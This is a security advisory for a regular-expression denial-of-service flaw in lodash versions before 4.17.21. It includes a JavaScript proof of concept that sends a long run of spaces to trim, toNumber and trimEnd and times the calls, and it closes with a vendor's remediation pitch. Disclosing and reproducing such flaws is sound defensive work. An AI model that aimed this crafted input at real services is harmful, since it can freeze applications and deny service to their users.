All versions of the package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the `toNumber`, `trim` and `trimEnd` functions. Each of them stripped whitespace with a regular expression, and a long run of whitespace that is not at the very end of the string makes that match backtrack quadratically, so a single attacker-controlled string can pin the event loop for seconds.

Steps to reproduce (provided by reporter Liyuan Chen):

```js
var lo = require('lodash');

// Build "1" + n spaces + "1": the trailing "1" forces the trim regex to
// scan the whole run of spaces, fail, and retry from the next position.
function build_blank(n) {
  var ret = "1";
  for (var i = 0; i < n; i++) {
    ret += " ";
  }
  return ret + "1";
}

var s = build_blank(50000);

var time0 = Date.now();
lo.trim(s);
var time_cost0 = Date.now() - time0;
console.log("time_cost0: " + time_cost0);

var time1 = Date.now();
lo.toNumber(s);
var time_cost1 = Date.now() - time1;
console.log("time_cost1: " + time_cost1);

var time2 = Date.now();
lo.trimEnd(s);
var time_cost2 = Date.now() - time2;
console.log("time_cost2: " + time_cost2);
```

The reported cost is the time (in milliseconds) each call takes; doubling `n` roughly quadruples it on an affected version, while 4.17.21 and later return in constant-factor time.
Fix available through Seal Security. No upgrade required, protect your application instantly.